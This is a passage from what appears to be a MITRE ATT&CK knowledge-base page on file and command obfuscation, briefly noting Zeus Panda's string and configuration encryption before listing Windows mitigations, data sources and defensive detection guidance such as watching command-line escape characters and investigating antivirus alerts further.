Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4.[387][388] |
S0672 | Zox |
ID | Mitigation | Description |
---|---|---|
M1049 | Antivirus/Antimalware |
Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted. [390] |
M1040 | Behavior Prevention on Endpoint |
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts. [391] |
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Creation |
File Metadata | ||
DS0009 | Process | Process Creation |
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. [392] [5] [393]
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.